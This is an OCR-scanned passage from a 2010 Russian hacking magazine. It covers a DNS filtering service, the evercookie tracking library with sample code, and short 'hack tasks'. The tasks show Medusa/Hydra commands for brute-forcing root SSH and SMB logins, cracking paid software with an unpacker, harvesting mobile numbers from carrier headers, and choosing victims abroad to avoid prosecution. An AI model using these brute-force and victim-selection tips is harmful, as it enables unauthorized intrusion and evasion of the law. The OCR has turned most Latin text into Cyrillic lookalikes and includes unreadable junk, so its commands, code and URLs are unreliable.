и наймом админов с прямыми руками, отчего их БЫЗ'ы частенько 
штормит), то для меня по данному пункту — зачет. Особенно круто, 
если тебе повезло жить в городе, где расположен сервер ЗкуБЫЗ. 
Законы физики никто не отменял: чем длиннее путь, который сигнал 
пробегает по проводам, тем ощутимее и задержка. Надо сказать, что 
она весьма заметна, особенно с учетом дополнительных тормозов 
сетевого оборудования. 

Фильтрация сайтов 
без лишнего софта 

Создатели сервиса говорят о гигантской базе сайтов (порядка 5 мил- 
лионов адресов), из которых значительная часть относится к таким 
социально неодобряемым категориям, как порнография или терро- 
ризм. Дело, конечно, личное: веб-интерфейс оставляет за тобой сво- 
боду выбора, какие именно категории заблочить. Но для повышения 
морального уровня младших родственников кое-что порезать стоит. 
Кроме того, ЗкуБЫЗ по умолчанию блокирует сайты, которые являют- 
ся рассадниками всякой гадости вроде малвары и спайвары, а также 
ресурсы мошенников, промышляющих рассылкой фишинговых ссы- 
лок по мылам доверчивых юзверей. Идея абсолютно верная, хотя и 
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Страница с настройками фильтра 



не очень актуальная для перцев с юниксовыми тачками. А вот бан- 
неры я заблочил просто с садистским удовольствием! Ложкой дегтя 
в бочку меда выступают весьма редкие, но все же ошибки категори- 
зации... Пару раз бывало, что вполне вменяемые сайты блокируются 
за якобы принадлежность к сайтам, распространяющим вирусы. В 
таких случаях выручает белый список: достаточно занести в него 
ошибочный домен, и доступ к нему открывается. Справедливости 
ради упомяну и про черный список доменов — он очень пригодится 
мне первого апреля, когда я перекрою брату доступ ВКонтакте :). 

Как этим пользоваться? 

Вся настройка осуществляется через веб-интерфейс, который 
получился слегка спартанским, но очень удобным и шустрым. 
Чтобы расставить все нужные галки, мне потребовалось не более 
пяти минут, после чего осталось перестроить маршрутизатор на 
адреса 8куБІ\І8 и довольно потирать руки после очередного полез- 
ного тюнинга сетевой инфраструктуры. Понятно, что перевести 
на рельсы 8куБЫ8 можно любой девайс, имеющий доступ в Инет 
— начиная от персоналок и ноутбуков, и заканчивая смартфона- 
ми, АВ8І_-модемами, маршрутизаторами и прочими железяками. 
Проще всего это сделать пользователям статических ІР-адресов, 
чуть сложнее будет с динамическими адресами (нужен дополни- 
тельный софт или поддержка со стороны железа), но это решаемо. 
В любом случае, фишки, о которых я рассказал выше — абсолютно 
бесплатны, и всегда останутся таковыми (разработчики зуб дают!). 
Так что заюзать сервис может даже самый бедный студент с дырой 
в кармане, т 
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Исходники библиотеки еѵегсоокіе 
мы выложили на нашем диске 




Создаем Соокіе, которые надолго задержатся 
в системе 

о Соокіез - верная технология, позволяющая веб-сайту «запомнить» 
пользователя, сохранить его настройки и не спрашивать каждый раз 
его логин и пароль. Можно подумать, что если удалить кукисы 
в браузере, то сайт тебя не узнает. Но эта уверенность обманчива. 



МОЖНО СКОЛЬКО УГОДНО ЗАМОРАЧИВАТЬСЯ О СВОЕЙ 
АНОНИМНОСТИ, ИСПОЛЬЗОВАТЬ ПРОКСИ И ѴРІЧ, ПОДДЕЛЫВАТЬ 
ЗАГОЛОВКИ НТТР-ЗАПРОСОВ, ВЫДАЮЩИЕ ИСПОЛЬЗУЕМУЮ 
СИСТЕМУ, ВЕРСИЮ БРАУЗЕРА, ЧАСОВОЙ ПОЯС И МОРЕ ДРУГОЙ 
ИНФЫ, НО У ВЕБ-САЙТА ВСЕ РАВНО ОСТАНУТСЯ СПОСОБЫ 
РАСПОЗНАТЬ ФАКТ ТОГО, ЧТО ТЫ НА НЕМ УЖЕ БЫВАЛ. Во мно- 
гих случаях это не особо критично, но только не в ситуации, 
когда на каком-то сервисе необходимо представиться другим 
пользователем или банально сохранить анонимность. Легко 
представить, как среагирует антифрод-система некой условной 
финансовой организации, если определит, что с одного компью- 
тера были выполнены авторизации под аккаунтами совершенно 
разных людей. Да и разве приятно осознавать, что кто-то в Сети 
может отслеживать твои перемещения? Едва ли. Но обо всем по 
порядку. 

Как работают куки? 

Чтобы идентифицировать пользователя, испокон веков исполь- 
зовались кукисы. Соокіез (от англ, «печенье») — это небольшая 
порция текстовой информации, которую сервер передает брау- 
зеру. Когда пользователь обращается к серверу (набирает его 
адрес в строке браузера), сервер может считывать информацию, 



содержащуюся в соокіез, и на основании ее анализа совершать 
какие-либо действия. Например, в случае авторизованного досту- 
па к чему-либо через веб в соокіез сохраняются логин и пароль в 
течение сессии, что позволяет пользователю не вводить их снова 
при запросах каждого документа, защищенного паролем. Таким 
образом, веб-сайт может «запомнить» пользователя. Технически 
это выглядит следующим образом. Запрашивая страницу, брау- 
зер отправляет веб-серверу короткий текст с НТТР-запросом. 
Например, для доступа к странице ѵѵѵѵѵѵ.ехатрІе.огд/іпсІех.ЫтІ 
браузер отправляет на сервер ѵѵѵѵѵѵ.ехатріе.огд следующий 
запрос: 

СЕТ /іпсіех . ЬДтІ НТТР/1.1 
Ноз Д : шт . ехатріе . огд 

Сервер отвечает, отправляя запрашиваемую страницу вместе с 
текстом, содержащим НТТР-ответ. Там может содержаться указание 
браузеру сохранить куки: 

НТТР/1.1 200 ОК 
СопДепД-Дуре : ДехД/ЬДшІ 
ЗеД-Соокіе: паше=ѵа1ие 
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Просматриваем РІа$Ь кукисы 
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Генерируем соокіе с помощью еѵегсоокіе 



Если есть строка Беі-соокіе, браузер запоминает строку 
паппе=ѵаІие (имя = значение) и отправляет ее обратно 
серверу с каждым последующим запросом: 

СЕТ /зрес.ккті НТТР/1.1 

Нозк : ѵт\лгѵ7 . ехатріе . огд 

Соокіе: пате=ѵа1ие 

Ассерк : */* 

Все очень просто. Если сервер получил от клиента 
куки и они есть у него в базе, он однозначно может 
их обработать. Таким образом, если это были кукисы 
с некоторой информацией об авторизации, у пользо- 
вателя в момент посещения не будет спрашиваться 
логин и пароль. По стандарту куки имеют определен- 
ный срок жизни (хоть он и может быть очень большим), 
после которого умирают. А любые сохраненные кукисы 
пользователь без труда может удалить, воспользовав- 
шись соответствующей опцией, которая есть в любом 
браузере. Этот факт сильно расстраивает владельцев 
многих ресурсов, которые не желают терять связь с 
посетителем. Им важно отслеживать его, понимать, что 
«вот этот человек был у нас вчера, а еще позавчера и 
т.д.». Особенно это касается различных анализаторов 
трафика, систем для ведения статистики, баннерных 
сетей и т.п. Вот тут-то и начинается самое интересное, 
потому что разработчики используют всякие ухищрения, 
о которых многие пользователи даже не подозревают. В 
ход идут различные уловки. 

РІазН-куки 

Все дело в том, что помимо обычных НТТР «плюшек», к 
которым все давно привыкли, сейчас активно исполь- 
зуются альтернативные хранилища, где браузер может 
записать данные на стороне клиента. Первое, что нужно 
упомянуть — это хранилище любимого и ненавистного 
одновременно Еіазб (для тех пользователей, у которых 
он установлен). Данные хранятся в так называемых І_50 
(Еосаі БбагесІ ОЬіесІз) — схожих с соокіез по формату 
файлах, которые сохраняются локально на компьютере 
пользователя. Подход во многом аналогичен обычным 
«плюшкам» (в этом случае на компьютере пользователя 
точно так же сохраняется небольшое количество тексто- 
вых данных), но имеет некоторые преимущества: 

- Еіазб-кукисы являются общими для всех браузеров 
на компьютере (в отличие от классической соокіе, кото- 
рая привязана к браузеру). Настройки, информация о 
сессии, как и, скажем, некий идентификатор для отсле- 



живания пользователя, не привязываются к какому-то 
конкретному браузеру, а становятся общими для всех. 

- Еіазб соокіе позволяет сохранять намного больший 
объем данных (как правило, 100 Кб), что увеличива- 
ет количество настроек пользователя, доступных для 
сохранения. 

На практике 650 становится очень простой и доступной 
технологией для трекинга пользователя. Задумайся: 
если бы я предлагал тебе удалить все «плюшки» в 
системе, ты бы вспомнил о Еіазб-кукисах? Вероятно, 
нет. А теперь попробуй взять любой просмотрщик, 
например, бесплатный РІазЬСоокіезѴіеѵѵ ( ѵѵѵѵѵѵ.пігзоб:. 
пеі/ибІзЛіазб соокіез ѵіеѵу.біті ) и посмотреть, сколько 
всего интересного записано в хранилищах Еіазб. Тут 
же вырисовывается и список сайтов, которые очень не 
хотят потерять твой след, даже если ты подчистишь кэш 
браузера (вместе с «плюшками»). 

Попробуй удали 

Но если об 650 слышали продвинутые пользователи и 
мало-мальски хорошие разработчики, то о существо- 
вании других техник хранения данных, подчас очень 
изощренных (но действенных), многие даже не подозре- 
вают. Взять хотя бы новые хранилища, которые появ- 
лялись в НТМІ_5 (Беззіоп Біогаде, І_осаІ Біогаде, ѲІоЬаІ 
Біогаде, Оаіабазе Біогаде ѵіа БОІЛе), о которых ты 
можешь прочитать в статье «НТМІ_5: да придет спаси- 
тель». Этой проблемой всерьез заморочился польский 
специалист по безопасности 5ату Каткаг. В результате 
на свет появилась специальная ЧаѵаБсгірІ-библиотека 
еѵегсоокіе, которая специально создана для того, чтобы 
создавать максимально живучие кукисы в браузере. 
Кто-то может спросить: «Зачем это нужно?». Очень 
просто: для того, чтобы однозначно идентифицировать 
посетителя страницы, если он придет вновь. Такие 
сложно убиваемые кукисы часто называются Тгаскіпд 
соокіез и даже определяются некоторыми антивирусами 
как угроза приватности. Еѵегсоокіе может свести все 
попытки остаться анонимным к нулю. 

Секрет в том, что еѵегсоокіе использует сразу все 
доступные для браузера хранилища: обычные НТТР- 
кукисы, І_50, контейнеры НТМІ_5. Кроме того, в ход 
идет несколько хитрых приемов, которые с не меньшим 
успехом позволяют оставить на компьютере желанную 
метку. Среди них: генерация особых РЫО-изображений, 
использование бізіогу браузера, хранение данных с 
помощью тега ЕТад, контейнер изегОаІа в Іпіегпеі 
Ехріогег — оказывается, что вариантов-то очень много. 




> іпіо 



Чтобы удалить любые 
іІазЬ соокіе, есть стан- 
дартный инструмент 
флеш. Для этого в 
браузере необходимо 
перейти по адресу 
ѵѵѵѵѵѵ.ппасгоппесііа. 
сот/зиррогі/ 
боситепіабоп/ги/ 
іІазЬрІаѵег/ЬеІр/ 
зеШпдз тападег07. 
Ыт . Там же есть 
настройки, позво- 
ляющие полностью 
запретить І_50. 
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іійкхЗяЪв сее =кл.п I. нел -іпе^е і! іпг :! 

ФС-ЭЬ-іЭ*С* НОТЯ!*»: 444 
ІсгаіГ--!'* НЕЬіипі 444 
«ІйййІВьм Еасііиішз шій*Гіл*й 
ііиійг/йаті и-с^ыеиі 444 
«Мі р .5іѵС-іи нсУііиіі ^гѵЗгГІЕіПІ 
СГ.СС+'* МС'ІГ.Ш Р ІОЧ 
+ --ш. Ч ^.-м шшсклпішс,- 414 
ВЙЧ Н;ГгІ^№4 414 
Ій-эСиІ.» асЬШпе 141 

Ваи г т=Ѵ 4лІ«і 114 іАіл | "іий* е-зеЬі* «л^Ьсес б?ліЫ«- г т.Н±п 
| йсМ Ій гг1]:йнг шмі 

ел 

ПИ)ЧА№К{«№>П ѴІШВДІГ ПК^’МІІЧ 4 ММ С«Илі 



Успешно восстанавливаем значение переменной, даже 
после очистки кукисов в браузере 




Код для подключения еѵегсоокіе 



В том, насколько это эффективно работает, можно убедиться на 
сайте разработчика — ЫірѴ/затѵ.рІ/еѵегсоокіе . Если нажать на 
кнопку «Сііск Іо сгеаіе ап еѵегсоокіе», в браузере будут созданы 
кукисы со случайным числом. Попробуй удалить кукисы везде, 
где это только возможно. Бьюсь об заклад, сейчас ты задумался: 
«Где еще можно удалить кукисы, кроме как в настройках брау- 
зера?». Уверен, что все удалил? Перезагрузи страницу для вер- 
ности, можешь даже заново открыть браузер. Вот теперь смело 
нажимай на кнопку «Сііск Іо гесіізсоѵег соокіез». ѴѴТР? Сайту это 
не помешало откуда-то взять данные — в полях страницы ото- 
бразилось число, которые было сохранено в кукисах. Но мы же их 
потерли? Как это получилось? Попробуем разобраться с некото- 
рыми техниками. 

Кукисы в РЫС 

Крайне интересным приемом, используемым в Еѵегсоокіе, 
является подход хранения данных в кэшированных РЫ6- 
изображениях. Когда еѵегсоокіе устанавливает куки, он обра- 
щается к скрипту еѵегсоокіе_рпд.рЬр со специальной НТТР 
«плюшкой», отличной от той, которая используется для хранения 
стандартной информации о сессии. Эти специальные кукисы 
считываются РНР-сценарием, создающим РЫО-изображение, в 
котором все значения РОВ (цветов) выставляются в соответствии 
с информацией о сессии. В конечном итоге РЫО-файл отправля- 
ется браузеру клиента с пометкой: «файл необходимо кэшировать 
20 лет». 

Получив эти данные, еѵегсоокіе удаляет созданные ранее специ- 
альные НТТР-кукисы, затем выполняет тот же самый запрос к 
тому же РНР-сценарию, но не предоставляя информации о поль- 
зователе. Тот видит, что интересующих его данных нет, и сгене- 
рировать РЫО он не может. Вместо этого браузеру возвращается 
поддельный НТТР-ответ «304 І\ІоІ МосІіГіесІ», что заставляет его 
вытащить файл из локального кэша. Изображение из кэша встав- 
ляется на страницу с помощью тега НТМІ_5 Сапѵаз. Как только это 
происходит, еѵегсоокіе считывает каждый пиксель содержимого 
Сапѵаз, извлекая Р6В-значения и, таким образом, восстанав- 
ливая данные изначальных кукисов, которые были сохранены в 
изображении. Вуаля, все работает. 

Хинт с ѴѴеЬ Ніз+огу 

Другой прием напрямую использует историю браузера. Как толь- 
ко браузер устанавливает плюшку, еѵегсоокіе с помощью алго- 
ритма Вазе64 кодирует данные, которые необходимо сохранить. 
Предположим, что этими данными является строка, полученная 
«бобе» после преобразований в Вазе64. Библиотека последова- 
тельно обращается в фоновом режиме к следующим І6РІ_: 

доодіе . сош/еѵегсоокіе/сасЬе/Ь 

доодіе . сот/еѵегсоокіе/сасЬе/Ьс 



доодіе . сош/еѵегсоокіе/саске/Ьссі 
доодіе . сот/еѵегсоокіе/саске/ЬссІе 
доодіе . сот/еѵегсоокіе/саске/ЬссІе- 

Таким образом, эти 16РІ_ сохраняются в Ьізіогу. Далее в ход 
идет специальный прием — С55 Нізіогу Кпоскег, который с 
помощью 65-скрипта и С55 позволяет проверить, посещал ли 
пользователь указанный ресурс или нет (подробнее тут — зату. 
рІ/сззЬаск ]. Для проверки плюшек еѵегсоокіе пробегается по 
всем возможным символам Вазе64 на доодіе. сот/еѵегсоокіе/ 
сасЬе, начиная с символа «а» и двигаясь далее, но только на 
один символ. Как только скрипт видит 16РІ_-адрес, к которому 
было обращение, он начинает перебор следующего символа. 
Получается своеобразный брутфорс. На деле этот подбор осу- 
ществляется чрезвычайно быстро, потому что никакие запро- 
сы к серверу не выполняются. Поиск в Ьізіогу осуществляется 
локально в максимально короткий срок. Библиотека знает, что 
достигла конца строки, когда 16РІ_ будет заканчиваться сим- 
волом «-». Декодируем Вазе64 и получаем наши данные. Как 
назвать разработчиков браузеров, которые это позволяют? 

Попробуй удали 

А что будет, если юзер потрет свои кукисы? Важная фишка 
самой библиотеки еѵегсоокіе в том, что пользователю придется 
основательно постараться, чтобы удалить кукисы, оставленные 
в разных местах — сейчас их 10. Если хотя бы в одном месте 
останутся данные куки, то они автоматически восстановятся и 
во всех других местах. Например, если пользователь не только 
удалит свои стандартные кукисы, но и очистит данные І_50, 
подчистит НТМІ_5-хранилища, что уже маловероятно, все равно 
останутся куки, созданные с помощью кэшированного РЫО и 
ѵѵеЬ Ьізіогу. При следующем же посещении сайта с еѵегсоокіе 
библиотека не только сможет найти запрятанную плюшку, но и 
восстановит их во всех остальных местах, которые поддержи- 
вает браузер клиента. Интересный момент связан с передачей 
«плюшек» между браузерами. Если пользователь получает куки- 
сы в одном браузере, то есть большая вероятность, что они вос- 
произведутся и в других. Единственное необходимое для этого 
условие — сохранение данных в І_осаІ ЗЬагеб ОЬ)есІ куке. 

Как использовать? 

Библиотека Еѵегсоокіе полностью открытая, поэтому ты можешь 
свободно пользоваться ей, подгонять под свои нужды. К сер- 
веру не предъявляется никаких серьезных требований. Все 
что нужно — это доступ к 65-сценарию, в котором содержится 
код еѵегсоокіе. Чтобы использовать ЕІазЬ-кукисы (Босаі 5Ьагеб 
ОЬ]‘есі), в папке со скриптом должен быть файл еѵегсоокіе. зѵѵі, а 



► 038 
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Режим инкогнито в СЬготе не спасает 



Щ сьапдеіод 
§) ЙЕАЭКЕ 
13 еѵегсоокіе - 51 а 



=і еѵегсоокіе 



33 



|^1 еѵегсоокіе . зѵі 



для работы техник, основанных на РЫб-кэшировании и исполь- 
зовании хранилища ЕТад, необходим доступ к РНР-сценариям 
еѵегсоокіе_рпд.рбр и еѵегсоокіе_еІад.рЬр. Использовать 
еѵегсоокіе можно на любой страничке сайта, подключив сле- 
дующий скрипт: 



3 еѵегсоскіеесад.рЬр 
3 еѵегсоокіе_рпд.рИр 



<зсгірк куре=" СехС/заѵазсгірС " 

ех&тріе .Ьсші 

згс = " зѵгіоЪэ еск-2 .2 . тіп . з з " ></зсгірк> 

<зсгірк куре= " кехк / з аѵазсгірк " 
згс= " еѵегсоокіе . з з " ></зсгірк> 



іпсіех.рЬр 



згс= " з диегу-1 .4.2. тіп .]з" ></зсгірк> 
<зсгірк кѵре= " кехк/і аѵазсгірк " 



1 



<зсгірк> 

ѵаг ес = пем еѵегсоокіе ( ) ; 



| =] зсгиегу“І.4.2.шіп.зз 



// устанавливаем соокіе " ісі" со значением "12345 
// синтаксис: ес.зек(кеу, ѵаіие) 
ес . зек ( " ісі" , "12345"); 




зКіОЬзесс-2 . 2 . тіп . з з 



// восстанавливаем кукису с именем " ісі" 
ес . дек ( " ісі" , кипскіоп (ѵаіие ) { 

аіегк (" Соокіе ѵаіие із " + ѵаіие) 

}) ; 



Для полноценной работы еѵегсоокіе необходимо 
наличие дополнительного 5ѴѴР-файла и двух РНР- 
сценариев 



Есть также другой способ получения кукисов, основанный на 
использовании более продвинутой саІІЬаск-функции. Это позво- 
ляет извлечь значения кукисов из различных используемых хра- 
нилищ и сравнить их между собой: 

кипскіоп декСоокіе (Ъезк_сапс1іс1аке , а11_сапсііс1акез ) 

{ 

аіегк ("Тке гекгіеѵесі соокіе із: " + Ъезк_ 

сапсіісіаке + "\п" + "Уои сап зее ѵгЪ ак еаск зкогаде 
тескапізт гекигпесі " + "Ьу Іооріпд ккгоидк кке а11_ 
сапсіісіакез оЪзеск."); 

ког (ѵаг ікет іп а11_сапсІісІакез ) 

сіоситепк .шгіке ( " Зкогаде тескапізт " + ікет + 

" гекигпесі: " + а11_сапс!іс1акез [ ікет] + 

"<Ъг>" ) ; 

} 

ес . дек ( " ісі" , декСоокіе); 

</зсгірк> 



Библиотека еѵегсоокіе доступна каждому. Это немного пугает, 
особенно если совершенно не представляешь, что можно про- 
тив нее предпринять. 

Как защититься? 

Проблем с тем, чтобы подчистить куки в браузере и ЕІазЬ'е, нет. Но 
попробуй удали данные везде, где наследила еѵегсоокіе! Ведь если 
оставишь куки в одном месте — скрипт автоматически восстановит 
значение и во всех остальных хранилищах. По сути, эта библиотека 
является хорошей проверкой режима приватности, который сейчас 
есть практически у всех браузеров. И вот что я тебе скажу: из Ѳоодіе 
СЬготе, Орега, Іпіегпеі Ехріогег и Забагі только последний в режиме 
«Ргіѵаіе Вгоѵѵзіпд» полностью блокировал все методы, используемые 
еѵегсоокіе. То есть после закрытия и открытия браузера скрипт не 
смог восстановить оставленное им значение. Есть повод задуматься. 
Тем более что в ближайшее время разработчик еѵегсоокіе обещал 
добавить в библиотеку еще несколько техник хранения данных, в 
том числе с помощью технологии Ізоіаіесі Эіогаде в ЭіІѵегІідЫ:, а 
также ^ѵа -апплета . "г 
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■ ■ Тюрин «ѲгеепОод» Алексей адгггсіодгадтаіі.сот) 
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вещей 





ЗАДАЧА: ПРОБРУТИТЬ ЛОГИН, ПАСС 
КРОРЗ, РТР, 55Н И Т.Д. 



РЕШЕНИЕ: 

Брутфорс — вещь достаточно полезная и приятная, особенно когда нет 
каких-то четких ограничений по времени. Включил брутилку — и зани- 
майся своими делами. Ачерез парудней — плоды собирай. Да и вообще, 
ни один пен-тестбез брута не обходится. Некоторые не верят в брут(аты 
веришь в брут? :) Типа, подбором можно заниматься годами... 

Но сервисов всяких много и по работе, и по досугу. К каждому пасстребу- 
ется знать. Добычному юзерутяжко отэтого, особенно сучетом корпора- 
тивных политик, когда каждый месяц надо что-то новое придумывать. 
Потому и выбирают пароли в стиле: 

123456 

Раззілгогб 

ііоѵеуои 

ргіпсезз 

госкуои (название «конторы») 

аЬс123 

ОѵтегСу 

АзЫеу 

ЬаЬудігІ 

шопкеу 

Кстати, эти взяты из топа анализа 32 миллионов паролей, выполненного 
компанией Ітрегѵа ( ітрегѵа.сот/ісі/рагзѵѵогсі герогі.азр ). 

Тутужгрехне побрутить. А главное — и инструментарий есть. 

Не считая всяких специализированных вещиц, основными брутфорсера- 
ми являются олдскульная ТНС-Нубга ЛгееѵѵогІб.іНс.ога/іНс-ИѵбгаЛ и более 
модная Мебиза ( Ьо^из.пеі/щтк/тесІиза/ппесІиза.ЫппІ ). Что приятно — и 
та, и другая входят в ВаскТгаск4, хотя установка их не должна вызвать 
каких-то проблем (есть только *піх- версии). 

Во многом программы похожи: модульные, «многопоточные», с хоро- 
шо настраиваемыми возможностями. Основное различие в том, как 
распараллеливается процесс перебора: у Мебиза — потоками, у Нубга 
— процессами. Что дает первой некое преимущество. Но есть еще более 
тонкие различия, особенно в модулях, так что желательно посмотреть 
сравнение возможностей тулз на іюоІиз.пеіУщппк/ппебиза/ппебиза- 
сотраге.біті. Можно брутить следующее (общий список): 

ТЕЬЫЕТ, АЕР , СѴЗ, ЕТР, НТТР, НТТРЗ , 30СК35 , НТТР-РКОХУ, 
ШАР, мз-зоь, РозкдгеЗОЬ, МуЗОЬ, ЫСР (БеШаге) , ШТР, 
РСЫЕЗ, РсАпуѵбіеге , РОРЗ , гехес, гіодіп, гзк, Театзреак, 
ЗМВ, ЗМВЫТ, ЗАР/КЗ, ЗМТР (АІІТН/ѴКЕУ) , ЗШР, ЗЗНѵ2 , ЗѴКГ, 
Теіпек, ѴтАиккб, Ж, Сізсо аикк, ІССЛ ЬБАРх и т.д. 

Атеперьхорошие новости: оба проекта были в неком забытьи, нотеперьза 
нихснова взялись и обещали не бросать :). Последняя версия Мебиза — 

2.0, Нубга — 5.7. Чего-то чрезвычайного или нового не добавили, но все же. 




Мебиза в деле. Подобрали рутовый пасс через 55Н 



Пару примеров по Мебиз’е. 

Подбираем рутовый пасс через 55Н: 

тебиза -Ь ѵіскіт.сот -и гоок -Р раззѵгогбз . кхк -М ззЬ 

Где-Ь, -и — задаем хости под кем логиниться; 

-Р — список па ролей для перебора; 

-М — к какому сервису подбираем пасс. 

Любой из элементов можно заменить списком или единичным значени- 
ем, указав заглавную или обычную букву соответственно. 

Брутим несколько хостов поБМВ: 

тебиза -М зтЬпк -С сотЬо.кхк 

Содержимое сотЬо.М имеетвид«хост:логин:пасс». Например: 

192.168.0. 2: абтіпізкгаког : раззмогб 

192.168.0. 2: кезкизег : разз 

192.168.0. 3: абтіпізкгаког : Ыак 

192 .168 .0. 4 : изегі : Іооразз 

Возможностей по настройке брута реально много, так что подстроить 
проги под конкретные потребности нетрудно. 

Кстати, для любителей мышки, есть версия гуиверсия — ХНубга :]. 
Словари для перебора легко найти в интернете. Их там много. Например, 
на аззѵѵогбз.ги есть словарь с заточкой под «российскую действитель- 
ность». 

Также есть интересный проект аѵѵід.огд/іпбех.деп , который по заданной 
теме составляет список релевантных слов, используя поисковики. 




► 040 
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ЗАДАЧА: БЫСТРО РАСПАКОВАТЬ 
ЕХЕ’ШКИ, ОЫ-’КИ 



РЕШЕНИЕ: 

Наверное, каждый, кто провел за компьютером приличный кусоксвоей 
жизни, хоть раз хотел взломать какую-нибудь полюбившуюся платную 
программу. Узнавал отом, как это делается. Возможно, пытался. Ау кого- 
то это даже получилось, и он стал зарабатывать этим делом себе на хлеб 
с маслом :). В инете по этому поводу много мануалов. 

Кстати, если есть желание познать «истины социализма», то почитай 
цикл статей «Введение в крэкингс нуля, используя ОІІуйЬд» (ѵѵазт. 
ги/5егіе5.рбр?5ІсІ=1 7). Он большой, очень подробный, заточенный под 
практику и нетребует каких-то особых начальныхзнаний. Прочтешь и 
поймешь — будешь на голову выше многих. Качественная вещь. Пере- 
водчикам — спасибо! 

Но вернемся кзадаче. Меня всегда напрягали всякие протекторы, шиф- 
ровщики, пакеры у программок, когда хотелось по-быстрому поковырять 
функционал, пореверсить чуток. Копаться обычно времени нет. И вот, 
нашлось универсальное средство, решающее эти проблемы — Оиіск 
ІІпраск 2.2 (ципраск.аЫ;еапп.огд/?р=436]. Авторам —спасибо! С помо- 
щью нее можно обойти целую кучу самых распространенных шифров- 
щиков, пакеров, протекторов, обфускаторов и восстановить исходный 
ехе’шник. Например, восстанавливает из ІЭРХ, АЗРаск, РЕ Оітіпізбег, 





Запаковано ІІРХ'ом, распаковано ОиіскІІпраск'ом 



РЕСотрасЕ РЕ-РАСК, РаскМап, ѴѴіпІЭРаск и еще сотни других. 

Из достоинств следует отметить, что восстанавливать можно также 
БЕЕки, есть импорт функций, можно дампить сам процесс, аттачась к 
нему, есть несколько ОЕР Епбег’ов, имеется поддержка скриптового 
языка ШАѵ\ многое другое (смотри в«хелпе»]. Но это уже для тех, кто 
втеме :). В основном же требуется всего пара кликов — указать файл, 
выбрать для него ОЕРЕпбеги распаковать. 



КІО 9 ЗАДАЧА: ПОЛУЧИТЬ ТЕЛЕФОННЫЕ НО- 

І1- и МЕРА МОБИЛЬНЫХ ЮЗЕРОВ 

РЕШЕНИЕ: 

Цивилизация пришла и к нам. Такие технологии, как 30 и уже олдскуль- 
ный 0РР5, у всех на слуху, у всех в кармане. Поползать по сети с мобиль- 
ника теперьсовсем не проблема, ведьдаже самые простые модели 
оснащены каким-то браузером. Да и тарифы операторов не кусаются. 
Воттолько появляются косяки другого плана . 

На прошедшей конференции «СапЗесѴѴезІ: 2010» исследователь СоШп 
МиШпегпредставил свои изыскания в области мобильныхтехнологий 
(тиШпег.огд/5есигііуЛеесІ/гапсІот_Іа[е5_ппоЬі[е_Ьаскег.рсІ1 : ]. Там много 
всего — отмодификации читалокдо ОоЗ’а мобилок. Но в рамках нашей 
темы интересен раздел про раскрытие личной информации, такой как 
номер мобильника, например. 

Из этого изыскания следует, что большинство операторов добавляют 
заголовки в НТТР-запросы. Это связано стем, что когда ты выходишь в 
интернетсобычнойтрубки.то тебя пускаютне напрямую в сеть, а через 
прокси, который и добавляетэти заголовки. В зависимости отопера- 
тора могут добавляться М5І50ІЧ (номер мобильного], ІМЕІ (уникальный 
номер самого телефона) или ІМ5І (уникальный номер симки]. У кого как. 
По сути, проблема в плохо сконфигурированных проксиках. 
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Распространение личной информации Билайном: 
номер ЗІМ'ки, модель телефона, что-нибудь еще? 



Зачем оно надо (в благих целях] — не совсем понятно. В злых — вариан- 
тов много, конфиденциальная информация, как-никак. Особенно суче- 
том того, что по мобильнику оченьлегко вычислить данные владельца. 
Протестить своего оператора можнотут— тиШпег.огд/рс.сді. Я про- 
верил Билайн — получил номер мобильника, его модель, примерное 
положение. Думаю, у остальных ситуация не лучше. 

Радует, что проблема касается только тех, кто ползает через ваповый 
инет, то есть пользователи КПК, всевозможных глазофонов и 36-моде- 
мов могутспать спокойно, так как их не пропускаютчерез злосчастный 
прокси. 



М 0 /■ ЗАДАЧА: НАЙТИ ДИАПАЗОНЫ ІР-АДРЕ- 
І1- Ц СОВ ПО ГЕОГРАФИЧЕСКОЙ ПРИВЯЗКЕ 

РЕШЕНИЕ: 

Согласись, зачастую нам все равно, кто будет нашей жертвой :]. 
Особенно, если нам требуется получить много машин и/или мы 
ищем их какими-то автоматизированными способами. 

А чтобы защитить себя от длинных рук правосудия, мы, конечно 
же, используем всякие ѴРІЧ’ы, п рокси ки и другие средства для 
поддержания личной анонимности. Хорошим дополнением к пе- 
речислен но му будет тот факт, что наши жертвы находятся в другой 



стане или на другом континенте. Тогда негативного фидбека можно 
не опасаться. Задача на деле простая, и не совсем понятно, почему 
она вызываету людей какие-то трудности. 

Есть множество сайтов типа ірасІсІгезБІосаЦоп.огд, ѵѵогісіірз.іпію, где 
всего лишьтребуется выбрать страну и нам покажут диапазоны ІР- 
адресов. 

К тому же, у регистраторов (РІРЕ, Р I Р N , еіс.] есть поиск по базам. 

У НІРІЧ’а (ги-сепіег] он выделился в сайд-проект ірдеоЬазе.ги. Так 
что мы можем найти диапазон, принадлежащий либо какой-то 
компании, либо какому-то конкретному лицу, либо находящийся в 
каком-то городе. Раздолье :). Не стоит забывать и о стандартном 
ѵѵбоіз’е. 



ХАКЕР 11/142/10 



► 041 










взлом 



ЗАДАЧА:ВКЛЮЧАЕМ МЕХАНИЗМЫ ЗА- 
ЩИТЫ ѴѴІЫ00ѴѴ5 ДЛЯ ПО, КОТОРОЕ ИХ 
НЕ ПОДДЕРЖИВАЕТ 

РЕШЕНИЕ: 

Еслиты был на СС’Ю.то наверняка посетил и проникся семинаром 
Алексея Синцова — «Обход защитных механизмов в ОС ѴѴіпсІоѵѵз». В 
зависимости оттого, за какой баррикадой находишься ты, тебе могло 
стать либо радостно, либо страшно :). Доклад классный, его можно найти 

на рагІуЮ.сс.огд.ги. 

Подведем итог: микрософтовцы, в общем, молодцы — внедрили в ѴѴіп7 
множество разных механизмов. И в определенныхситуациях можно 
даже создать«непробиваемую» систему. Воттолько основная пробле- 
ма втом, что дл я использования этих механизмов и само ПО, и все его 
модули должны быть собраны с их поддержкой. А сторонние производи- 
тели (даже гранды, например, АбоЬе, Могіііа) с этим грешат. В прошлом 
номере я писал отом, в каком широко распространенном ПО отсутствует 
поддержка ЭЕР, АЗбР и т.д. 

Что еще хуже — конечному пользователю на это особо не повлиять. Типа, 
исходников нет— перекомпилить не можешь. Нотакбыло до недавнего 
времени. 

Возрадуемся! М5 выпустила неофициальнуютулзу, а точнее, ее вторую 
версию, которая поможет нам подключать необходимые механизмы (и 
даже больше] для процессов, вне зависимости отсборки программы. 

Имя ей — ЕМЕТ 2.0, ЕпЬапсесІ МіЬдаЬоп Ехрегіепсе ТооІкМ: (ЫодзТесЬпек 
сот/Ь/5гсІ/агсЫѵе/20 1 0/09/02/епЬапсесІ-тМ:іда1:іоп-ехрегіепсе-1:ооІкі1;- 
